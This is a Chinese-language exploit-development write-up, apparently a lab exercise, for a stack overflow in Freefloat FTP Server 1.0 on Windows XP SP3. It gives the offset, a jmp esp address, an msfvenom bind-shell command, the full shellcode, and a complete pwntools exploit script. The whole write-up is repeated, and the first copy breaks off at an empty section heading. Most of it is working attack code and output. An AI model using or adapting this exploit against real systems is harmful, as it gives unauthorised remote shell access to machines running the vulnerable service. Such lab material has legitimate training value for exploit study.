Freefloat_FTP_Server1.0
0x00 基本介绍
此处以Freefloat FTP Server1.0为例
- 测试软件:Freefloat FTP Server1.0
- 虚拟机:Windows XP Pro Sp3
- 工具:Immunity Debugger、Pwntools、Metasploit
0x01 溢出
# Test script: send one over-long line to the FTP service and see whether the
# saved return address is overwritten (the screenshot below shows EIP = 41414141).
from pwn import *

# FTP control connection to the lab VM (addresses from section 0x00).
conn = remote(host="192.168.137.128", port=21)
# 500 bytes of 'A' (0x41); any four of them landing in EIP identify the crash.
junk = "A" * 500
conn.sendline(junk)
# Hand the control connection over to the terminal so the crash can be observed.
conn.interactive()
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3998ca97-30bd-4a8a-9dfc-dab229c82dd4/Untitled.png
EIP被覆盖为41414141,即AAAA,如果将这个AAAA替换成我们准备好的指令地址,就能执行任意指令,同时我们需要知道这个指令覆盖的偏移量,即这500个字符哪四个字符刚好可以覆盖EIP的位置。
0x02 偏移量
Mona
#生成500个垃圾字符
!mona pc 500
//Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
替换原有的垃圾字符
# Offset-finding variant of the test script: the 500-byte 'A' run is replaced
# with the non-repeating Mona pattern (`!mona pc 500`) so that the four bytes
# that land in EIP can be mapped back to an offset with `!mona po`.
from pwn import *

conn = remote(host="192.168.137.128", port=21)
# Original probe for reference: "A" * 500
pattern = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4"
)
conn.sendline(pattern)
conn.interactive()
重新运行溢出脚本:EIP=34694133
!mona po 34694133
#found in cyclic pattern at position 251
偏移量为251
0x03 跳板技术JMP ESP
查找jmp esp地址
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ebd9da0e-1ac2-4940-a0a8-5fd16cf70d41/Untitled.png
选择
Message= 0x77dbf049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x04 Shellcode
滑板:
'\x90'*20
生成Shellcode
msfvenom -p windows/shell_bind_tcp LHOSTS=192.168.137.1 LPORT=4444 -b '\x00\x0a\x0d' -f c
"\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61";
0x05 Pwn
最终攻击代码
# Final proof-of-concept for the Freefloat FTP Server 1.0 stack overflow worked
# out in sections 0x01-0x04. The single line sent to the service is laid out as:
#   251 bytes filler | 4-byte return address | 20-byte NOP sled | shellcode
# The exact bytes on the wire are the whole behaviour of this script, so the
# literals and their concatenation order must not be changed.
# It relies on the shellcode region being executable and on the jmp esp address
# being fixed (the Mona line in 0x03 reports ASLR: False, Rebase: False for
# ADVAPI32.dll v5.1.2600.5512); on a system where either does not hold the
# process just crashes.
# NOTE(review): everything is built from str (not bytes) literals; which bytes
# pwntools emits for code points above 0x7f depends on the interpreter and its
# encoding settings — confirm on the interpreter actually in use.
from pwn import *
# FTP control connection to the lab VM (section 0x00).
p = remote("192.168.137.128", 21)
# 251 filler bytes (0x41): the distance to the saved return address reported by
# `!mona po 34694133` in section 0x02.
payload ='\x41'*251
# Overwrites EIP with 0x77dbf049 written little-endian: the `jmp esp` in
# ADVAPI32.dll chosen in section 0x03. Valid only for that exact DLL build.
eip='\x49\xf0\xdb\x77'
# NOP sled; after `jmp esp` execution slides through these into the shellcode.
sled='\x90'*20
# msfvenom windows/shell_bind_tcp output from section 0x04, generated with
# -b '\x00\x0a\x0d' (presumably to avoid NUL and the CR/LF that end an FTP line).
# Reproduced byte-for-byte; a successful run leaves the target listening on
# TCP 4444 (LPORT), which is the observable artefact of this payload.
shellcode=("\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61")
# Concatenation order mirrors the stack layout described at the top.
last=payload+eip+sled+shellcode
p.sendline(last)
# Attaches the terminal to the FTP control connection itself, not to the bind
# payload's LPORT.
p.interactive()
攻击效果如图:
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f244a500-0ae1-45ec-94d2-38d0ab05b287/Untitled.png
0x06 疑问
0x00 基本介绍
此处以Freefloat FTP Server1.0为例
- 测试软件:Freefloat FTP Server1.0
- 虚拟机:Windows XP Pro Sp3
- 工具:Immunity Debugger、Pwntools、Metasploit
0x01 溢出
# Test script: send one over-long line to the FTP service and see whether the
# saved return address is overwritten (the screenshot below shows EIP = 41414141).
from pwn import *

# FTP control connection to the lab VM (addresses from section 0x00).
conn = remote(host="192.168.137.128", port=21)
# 500 bytes of 'A' (0x41); any four of them landing in EIP identify the crash.
junk = "A" * 500
conn.sendline(junk)
# Hand the control connection over to the terminal so the crash can be observed.
conn.interactive()
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3998ca97-30bd-4a8a-9dfc-dab229c82dd4/Untitled.png
EIP被覆盖为41414141,即AAAA,如果将这个AAAA替换成我们准备好的指令地址,就能执行任意指令,同时我们需要知道这个指令覆盖的偏移量,即这500个字符哪四个字符刚好可以覆盖EIP的位置。
0x02 偏移量
Mona
#生成500个垃圾字符
!mona pc 500
//Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
替换原有的垃圾字符
# Offset-finding variant of the test script: the 500-byte 'A' run is replaced
# with the non-repeating Mona pattern (`!mona pc 500`) so that the four bytes
# that land in EIP can be mapped back to an offset with `!mona po`.
from pwn import *

conn = remote(host="192.168.137.128", port=21)
# Original probe for reference: "A" * 500
pattern = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4"
)
conn.sendline(pattern)
conn.interactive()
重新运行溢出脚本:EIP=34694133
!mona po 34694133
#found in cyclic pattern at position 251
偏移量为251
0x03 跳板技术JMP ESP
查找jmp esp地址
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ebd9da0e-1ac2-4940-a0a8-5fd16cf70d41/Untitled.png
选择
Message= 0x77dbf049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x04 Shellcode
滑板:
'\x90'*20
生成Shellcode
msfvenom -p windows/shell_bind_tcp LHOSTS=192.168.137.1 LPORT=4444 -b '\x00\x0a\x0d' -f c
"\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61";
0x05 Pwn
最终攻击代码
# Final proof-of-concept for the Freefloat FTP Server 1.0 stack overflow worked
# out in sections 0x01-0x04. The single line sent to the service is laid out as:
#   251 bytes filler | 4-byte return address | 20-byte NOP sled | shellcode
# The exact bytes on the wire are the whole behaviour of this script, so the
# literals and their concatenation order must not be changed.
# It relies on the shellcode region being executable and on the jmp esp address
# being fixed (the Mona line in 0x03 reports ASLR: False, Rebase: False for
# ADVAPI32.dll v5.1.2600.5512); on a system where either does not hold the
# process just crashes.
# NOTE(review): everything is built from str (not bytes) literals; which bytes
# pwntools emits for code points above 0x7f depends on the interpreter and its
# encoding settings — confirm on the interpreter actually in use.
from pwn import *
# FTP control connection to the lab VM (section 0x00).
p = remote("192.168.137.128", 21)
# 251 filler bytes (0x41): the distance to the saved return address reported by
# `!mona po 34694133` in section 0x02.
payload ='\x41'*251
# Overwrites EIP with 0x77dbf049 written little-endian: the `jmp esp` in
# ADVAPI32.dll chosen in section 0x03. Valid only for that exact DLL build.
eip='\x49\xf0\xdb\x77'
# NOP sled; after `jmp esp` execution slides through these into the shellcode.
sled='\x90'*20
# msfvenom windows/shell_bind_tcp output from section 0x04, generated with
# -b '\x00\x0a\x0d' (presumably to avoid NUL and the CR/LF that end an FTP line).
# Reproduced byte-for-byte; a successful run leaves the target listening on
# TCP 4444 (LPORT), which is the observable artefact of this payload.
shellcode=("\xda\xc1\xbb\x1a\xf9\xbf\x94\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xc2\x04\x31\x5a\x13\x03\x40\xea\x5d\x61\x88\xe4\x20"
"\x8a\x70\xf5\x44\x02\x95\xc4\x44\x70\xde\x77\x75\xf2\xb2\x7b"
"\xfe\x56\x26\x0f\x72\x7f\x49\xb8\x39\x59\x64\x39\x11\x99\xe7"
"\xb9\x68\xce\xc7\x80\xa2\x03\x06\xc4\xdf\xee\x5a\x9d\x94\x5d"
"\x4a\xaa\xe1\x5d\xe1\xe0\xe4\xe5\x16\xb0\x07\xc7\x89\xca\x51"
"\xc7\x28\x1e\xea\x4e\x32\x43\xd7\x19\xc9\xb7\xa3\x9b\x1b\x86"
"\x4c\x37\x62\x26\xbf\x49\xa3\x81\x20\x3c\xdd\xf1\xdd\x47\x1a"
"\x8b\x39\xcd\xb8\x2b\xc9\x75\x64\xcd\x1e\xe3\xef\xc1\xeb\x67"
"\xb7\xc5\xea\xa4\xcc\xf2\x67\x4b\x02\x73\x33\x68\x86\xdf\xe7"
"\x11\x9f\x85\x46\x2d\xff\x65\x36\x8b\x74\x8b\x23\xa6\xd7\xc4"
"\x80\x8b\xe7\x14\x8f\x9c\x94\x26\x10\x37\x32\x0b\xd9\x91\xc5"
"\x6c\xf0\x66\x59\x93\xfb\x96\x70\x50\xaf\xc6\xea\x71\xd0\x8c"
"\xea\x7e\x05\x38\xe2\xd9\xf6\x5f\x0f\x99\xa6\xdf\xbf\x72\xad"
"\xef\xe0\x63\xce\x25\x89\x0c\x33\xc6\xa4\x90\xba\x20\xac\x38"
"\xeb\xfb\x58\xfb\xc8\x33\xff\x04\x3b\x6c\x97\x4d\x2d\xab\x98"
"\x4d\x7b\x9b\x0e\xc6\x68\x1f\x2f\xd9\xa4\x37\x38\x4e\x32\xd6"
"\x0b\xee\x43\xf3\xfb\x93\xd6\x98\xfb\xda\xca\x36\xac\x8b\x3d"
"\x4f\x38\x26\x67\xf9\x5e\xbb\xf1\xc2\xda\x60\xc2\xcd\xe3\xe5"
"\x7e\xea\xf3\x33\x7e\xb6\xa7\xeb\x29\x60\x11\x4a\x80\xc2\xcb"
"\x04\x7f\x8d\x9b\xd1\xb3\x0e\xdd\xdd\x99\xf8\x01\x6f\x74\xbd"
"\x3e\x40\x10\x49\x47\xbc\x80\xb6\x92\x04\xb0\xfc\xbe\x2d\x59"
"\x59\x2b\x6c\x04\x5a\x86\xb3\x31\xd9\x22\x4c\xc6\xc1\x47\x49"
"\x82\x45\xb4\x23\x9b\x23\xba\x90\x9c\x61")
# Concatenation order mirrors the stack layout described at the top.
last=payload+eip+sled+shellcode
p.sendline(last)
# Attaches the terminal to the FTP control connection itself, not to the bind
# payload's LPORT.
p.interactive()
攻击效果如图:
!https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f244a500-0ae1-45ec-94d2-38d0ab05b287/Untitled.png